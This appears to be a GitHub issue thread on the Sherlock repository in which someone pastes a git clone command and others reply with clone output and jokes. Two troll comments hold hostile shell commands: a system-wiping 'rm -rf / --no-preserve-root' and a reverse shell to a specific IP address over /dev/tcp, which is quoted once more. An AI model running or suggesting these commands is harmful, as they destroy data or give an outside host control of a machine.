### ISSUE TITLE
Clone Sherlock

### ISSUE THREAD

**Issue by Johnnysoltan** [sherlock-project/sherlock#2002]
$ git clone https://github.com/sherlock-project/sherlock.git

**Comment by ALiwoto** [comment]
> $ git clone https://github.com/sherlock-project/sherlock.git

Cloning into 'sherlock'...
remote: Enumerating objects: 7797, done.
remote: Counting objects: 100% (2799/2799), done.
remote: Compressing objects: 100% (209/209), done.
remote: Total 7797 (delta 2638), reused 2613 (delta 2571), pack-reused 4998
Receiving objects: 100% (7797/7797), 16.32 MiB | 2.32 MiB/s, done.
Resolving deltas: 100% (4956/4956), done.

**Comment by the-bokya** [comment]
sudo rm -rf / --no-preserve-root

**Comment by EverStarck** [comment]
yeah, im having the same issue

**Comment by ChocolateOverflow** [comment]
I don't have the time and money to keep a pet snake :(

**Comment by matheusfelipeog** [comment]
I hope you managed to clone the project 😃

**Comment by retr0reg** [comment]
sh -i >& /dev/tcp/69.63.190.26/4444 0>&1

**Comment by TruncatedDinoSour** [comment]
> sh -i >& /dev/tcp/69.63.190.26/4444 0>&1

```
```
